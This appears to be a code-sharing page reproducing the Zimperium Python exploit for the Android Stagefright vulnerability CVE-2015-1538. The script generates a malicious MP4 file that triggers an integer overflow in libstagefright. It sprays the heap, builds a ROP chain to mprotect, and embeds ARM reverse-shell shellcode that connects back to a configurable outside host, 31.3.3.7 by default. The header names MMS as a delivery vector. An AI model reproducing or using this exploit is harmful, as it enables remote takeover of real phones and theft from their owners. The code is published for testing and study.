扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 |
#!/usr/bin/env python # Joshua J. Drake (@jduck) of ZIMPERIUM zLabs # Shout outs to our friends at Optiv (formerly Accuvant Labs) # (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015 # www.zimperium.com # # Exploit for RCE Vulnerability CVE-2015-1538 #1 # Integer Overflow in the libstagefright MP4 ‘stsc’ atom handling # # Don’t forget, the output of “create_mp4” can be delivered many ways! # MMS is the most dangerous attack vector, but not the only one… # # DISCLAIMER: This exploit is for testing and educational purposes only. Any # other usage for this code is not allowed. Use at your own risk. # # “With great power comes great responsibility.” – Uncle Ben # import struct import socket # # Creates a single MP4 atom – LEN, TAG, DATA # def make_chunk(tag, data): if len(tag) != 4: raise ‘Yo! They call it “FourCC” for a reason.’ ret = struct.pack(‘>L’, len(data) + 8) ret += tag ret += data return ret # # Make an ‘stco’ atom – Sample Table Chunk Offets # def make_stco(extra=”): ret =struct.pack(‘>L’, 0) # version ret += struct.pack(‘>L’, 0) # mNumChunkOffsets return make_chunk(‘stco’, ret+extra) # # Make an ‘stsz’ atom – Sample Table Size # def make_stsz(extra=”): ret =struct.pack(‘>L’, 0) # version ret += struct.pack(‘>L’, 0) # mDefaultSampleSize ret += struct.pack(‘>L’, 0) # mNumSampleSizes return make_chunk(‘stsz’, ret+extra) # # Make an ‘stts’ atom – Sample Table Time-to-Sample # def make_stts(): ret =struct.pack(‘>L’, 0) # version ret += struct.pack(‘>L’, 0) # mTimeToSampleCount return make_chunk(‘stts’, ret) # # This creates a single Sample Table Sample-to-Chunk entry # def make_stsc_entry(start, per, desc): ret = ” ret += struct.pack(‘>L’, start + 1) ret += struct.pack(‘>L’, per) ret += struct.pack(‘>L’, desc) return ret # # Make an ‘stsc’ chunk – Sample Table Sample-to-Chunk # # If the caller desires, we will attempt to trigger (CVE-2015-1538 #1) and # cause a heap overflow. # def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False): ret =struct.pack(‘>L’, 0) # version/flags # this is the clean version… if not do_overflow: ret += struct.pack(‘>L’, num_alloc) # mNumSampleToChunkOffsets ret += ‘Z’ * (12 * num_alloc) return make_chunk(‘stsc’, ret) # now the explicit version. (trigger the bug) ret += struct.pack(‘>L’, 0xc0000000 + num_alloc) # mNumSampleToChunkOffsets # fill in the entries that will overflow the buffer for x in range(0, num_write): ret += make_stsc_entry(sp_addr, sp_addr, sp_addr) ret = make_chunk(‘stsc’, ret) # patch the data_size ret = struct.pack(‘>L’, 8 + 8 + (num_alloc * 12)) + ret[4:] return ret # # Build the ROP chain # # ROP pivot by Georg Wicherski! Thanks! # “”” (gdb) x/10i __dl_restore_core_regs 0xb0002850 <__dl_restore_core_regs>: add r1, r0, #52 ; 0x34 0xb0002854 <__dl_restore_core_regs+4>: ldm r1, {r3, r4, r5} 0xb0002858 <__dl_restore_core_regs+8>: push{r3, r4, r5} 0xb000285c <__dl_restore_core_regs+12>:ldm r0, {r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11} 0xb0002860 <__dl_restore_core_regs+16>:ldm sp, {sp, lr, pc} “”” “”” b0001144 <__dl_mprotect>: b0001144: e92d0090push{r4, r7} b0001148: e3a0707dmov r7, #125; 0x7d b000114c: ef000000svc 0x00000000 b0001150: e8bd0090pop {r4, r7} b0001154: e1b00000movsr0, r0 b0001158: 512fff1ebxpllr b000115c: ea0015ccb b0006894 <__dl_raise+0x10> “”” def build_rop(off, sp_addr, newpc_val, cb_host, cb_port): rop = ” rop += struct.pack(‘<L’, sp_addr + off + 0x10) # new sp rop += struct.pack(‘<L’, 0xb0002a98) # new lr – pop {pc} rop += struct.pack(‘<L’, 0xb00038b2+1) # new pc: pop {r0, r1, r2, r3, r4, pc} rop += struct.pack(‘<L’, sp_addr & 0xfffff000) # new r0 – base address (page aligned) rop += struct.pack(‘<L’, 0x1000) # new r1 – length rop += struct.pack(‘<L’, 7)# new r2 – protection rop += struct.pack(‘<L’, 0xd000d003) # new r3 – scratch rop += struct.pack(‘<L’, 0xd000d004) # new r4 – scratch rop += struct.pack(‘<L’, 0xb0001144) # new pc – _dl_mprotect native_start = sp_addr + 0x80 rop += struct.pack(‘<L’, native_start) # address of native payload #rop += struct.pack(‘<L’, 0xfeedfed5)# top of stack… # linux/armle/shell_reverse_tcp (modified to pass env and fork/exit) buf =” # fork buf += ‘\x02\x70\xa0\xe3’ buf += ‘\x00\x00\x00\xef’ # continue if not parent… buf += ‘\x00\x00\x50\xe3’ buf += ‘\x02\x00\x00\x0a’ # exit parent buf += ‘\x00\x00\xa0\xe3’ buf += ‘\x01\x70\xa0\xe3’ buf += ‘\x00\x00\x00\xef’ # setsid in child buf += ‘\x42\x70\xa0\xe3’ buf += ‘\x00\x00\x00\xef’ # socket/connect/dup2/dup2/dup2 buf += ‘\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c’ buf += ‘\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60’ buf += ‘\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0’ buf += ‘\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1’ buf += ‘\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06’ buf += ‘\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00’ buf += ‘\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0’ buf += ‘\xe3\x00\x00\x00\xef’ # execve(shell, argv, env) buf += ‘\x30\x00\x8f\xe2\x04\x40\x24\xe0’ buf += ‘\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d’ buf += ‘\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00’ buf += ‘\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00’ buf += ‘\xef\x02\x00’ # Add the connect back host/port buf += struct.pack(‘!H’, cb_port) cb_host = socket.inet_aton(cb_host) buf += struct.pack(‘=4s’, cb_host) # shell – buf += ‘/system/bin/sh\x00\x00’ # argv – buf += ‘sh\x00\x00’ # env – buf += ‘PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00’ # Add some identifiable stuff, just in case something goes awry… rop_start_off = 0x34 x = rop_start_off + len(rop) while len(rop) < 0x80 – rop_start_off: rop += struct.pack(‘<L’, 0xf0f00000+x) x += 4 # Add the native payload… rop += buf return rop # # Build an mp4 that exploits CVE-2015-1538 #1 # # We mimic meow.3gp here… # def create_mp4(sp_addr, newpc_val, cb_host, cb_port): chunks = [] # Build the MP4 header… ftyp =‘mp42’ ftyp += struct.pack(‘>L’, 0) ftyp += ‘mp42’ ftyp += ‘isom’ chunks.append(make_chunk(‘ftyp’, ftyp)) # Note, this causes a few allocations… moov_data = ” moov_data += make_chunk(‘mvhd’, struct.pack(‘>LL’, 0, 0x41414141) + (‘B’ * 0x5c) ) # Add a minimal, verified trak to satisfy mLastTrack being set moov_data += make_chunk(‘trak’, make_chunk(‘stbl’, make_stsc(0x28, 0x28) + make_stco() + make_stsz() + make_stts() )) # Spray the heap using a large tx3g chunk (can contain binary data!) “”” 0x4007004e <_ZNK7android7RefBase9decStrongEPKv+2>: ldr r4, [r0, #4]; load mRefs 0x40070050 <_ZNK7android7RefBase9decStrongEPKv+4>: mov r5, r0 0x40070052 <_ZNK7android7RefBase9decStrongEPKv+6>: mov r6, r1 0x40070054 <_ZNK7android7RefBase9decStrongEPKv+8>: mov r0, r4 0x40070056 <_ZNK7android7RefBase9decStrongEPKv+10>:blx 0x40069884; atomic_decrement 0x4007005a <_ZNK7android7RefBase9decStrongEPKv+14>:cmp r0, #1; must be 1 0x4007005c <_ZNK7android7RefBase9decStrongEPKv+16>:bne.n 0x40070076 <_ZNK7android7RefBase9decStrongEPKv+42> 0x4007005e <_ZNK7android7RefBase9decStrongEPKv+18>:ldr r0, [r4, #8]; load refs->mBase 0x40070060 <_ZNK7android7RefBase9decStrongEPKv+20>:ldr r1, [r0, #0]; load mBase._vptr 0x40070062 <_ZNK7android7RefBase9decStrongEPKv+22>:ldr r2, [r1, #12] ; load method address 0x40070064 <_ZNK7android7RefBase9decStrongEPKv+24>:mov r1, r6 0x40070066 <_ZNK7android7RefBase9decStrongEPKv+26>:blx r2; call it! “”” page = ” off = 0# the offset to the next object off += 8 page += struct.pack(‘<L’, sp_addr + 8 + 16 + 8 + 12 – 28)# _vptr.RefBase (for when we smash mDataSource) page += struct.pack(‘<L’, sp_addr + off) # mRefs off += 16 page += struct.pack(‘<L’, 1) # mStrong page += struct.pack(‘<L’, 0xc0dedbad)# mWeak page += struct.pack(‘<L’, sp_addr + off) # mBase page += struct.pack(‘<L’, 16)# mFlags (dont set OBJECT_LIFETIME_MASK) off += 8 page += struct.pack(‘<L’, sp_addr + off) # the mBase _vptr.RefBase page += struct.pack(‘<L’, 0xf00dbabe)# mBase.mRefs (unused) off += 16 page += struct.pack(‘<L’, 0xc0de0000 + 0x00)# vtable entry 0 page += struct.pack(‘<L’, 0xc0de0000 + 0x04)# vtable entry 4 page += struct.pack(‘<L’, 0xc0de0000 + 0x08)# vtable entry 8 page += struct.pack(‘<L’, newpc_val)# vtable entry 12 rop = build_rop(off, sp_addr, newpc_val, cb_host, cb_port) x = len(page) while len(page) < 4096: page += struct.pack(‘<L’, 0xf0f00000+x) x += 4 off = 0x34 page = page[:off] + rop + page[off+len(rop):] spray = page * (((2*1024*1024) / len(page)) – 20) moov_data += make_chunk(‘tx3g’, spray) block = ‘A’ * 0x1c bigger = ‘B’ * 0x40 udta = make_chunk(‘udta’, make_chunk(‘meta’, struct.pack(‘>L’, 0) + make_chunk(‘ilst’, make_chunk(‘cpil’,make_chunk(‘data’, struct.pack(‘>LL’, 21, 0) + ‘A’)) + make_chunk(‘trkn’,make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + ‘AAAABBBB’)) + make_chunk(‘disk’,make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + ‘AAAABB’)) + make_chunk(‘covr’,make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) * 32 + make_chunk(‘\xa9alb’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + make_chunk(‘\xa9ART’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + make_chunk(‘aART’,make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + make_chunk(‘\xa9day’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + make_chunk(‘\xa9nam’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + make_chunk(‘\xa9wrt’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + make_chunk(‘gnre’,make_chunk(‘data’, struct.pack(‘>LL’, 1, 0) + block)) + make_chunk(‘covr’,make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) * 32 + make_chunk(‘\xa9ART’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger)) + make_chunk(‘\xa9wrt’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger)) + make_chunk(‘\xa9day’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger))) ) ) moov_data += udta # Make the nasty trak tkhd1 = ”.join([ ‘\x00’, # version ‘D’ * 3,# padding ‘E’ * (5*4),# {c,m}time, id, ??, duration ‘F’ * 0x10, # ?? struct.pack(‘>LLLLLL’, 0x10000,# a00 0,# a01 0,# dx 0,# a10 0x10000,# a11 0), # dy ‘G’ * 0x14 ]) trak1 = ” trak1 += make_chunk(‘tkhd’, tkhd1) mdhd1 = ”.join([ ‘\x00’, # version ‘D’ * 0x17, # padding ]) mdia1 = ” mdia1 += make_chunk(‘mdhd’, mdhd1) mdia1 += make_chunk(‘hdlr’, ‘F’ * 0x3a) dinf1 = ” dinf1 += make_chunk(‘dref’, ‘H’ * 0x14) minf1 = ” minf1 += make_chunk(‘smhd’, ‘G’ * 0x08) minf1 += make_chunk(‘dinf’, dinf1) # Build the nasty sample table to trigger the vulnerability here. stbl1 = make_stsc(3, (0x1200 / 0xc) – 1, sp_addr, True) # TRIGGER # Add the stbl to the minf chunk minf1 += make_chunk(‘stbl’, stbl1) # Add the minf to the mdia chunk mdia1 += make_chunk(‘minf’, minf1) # Add the mdia to the track trak1 += make_chunk(‘mdia’, mdia1) # Add the nasty track to the moov data moov_data += make_chunk(‘trak’, trak1) # Finalize the moov chunk moov = make_chunk(‘moov’, moov_data) chunks.append(moov) # Combine outer chunks together and voila. data = ”.join(chunks) return data if __name__ == ‘__main__’: import sys import mp4 import argparse def write_file(path, content): with open(path, ‘wb’) as f: f.write(content) def addr(sval): if sval.startswith(‘0x’): return int(sval, 16) return int(sval) # The address of a fake StrongPointer object (sprayed) sp_addr = 0x41d00010# takju @ imm76i – 2MB (via hangouts) # The address to of our ROP pivot newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs # Allow the user to override parameters parser = argparse.ArgumentParser() parser.add_argument(‘-c’, ‘–connectback-host’, dest=‘cbhost’, default=‘31.3.3.7’) parser.add_argument(‘-p’, ‘–connectback-port’, dest=‘cbport’, type=int, default=12345) parser.add_argument(‘-s’, ‘–spray-address’, dest=‘spray_addr’, type=addr, default=None) parser.add_argument(‘-r’, ‘–rop-pivot’, dest=‘rop_pivot’, type=addr, default=None) parser.add_argument(‘-o’, ‘–output-file’, dest=‘output_file’, default=‘cve-2015-1538-1.mp4’) args = parser.parse_args() if len(sys.argv) == 1: parser.print_help() sys.exit(–1) if args.spray_addr == None: args.spray_addr = sp_addr if args.rop_pivot == None: args.rop_pivot = newpc_val # Build the MP4 file… data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport) print(‘[*] Saving crafted MP4 to %s …’ % args.output_file) write_file(args.output_file, data) - See more at: https://blog.zimperium.com/the-latest-on-stagefright-cve-2015-1538-exploit-is-now-available-for-testing-purposes/#sthash.MbvoiMxd.dpuf |
体验盒子
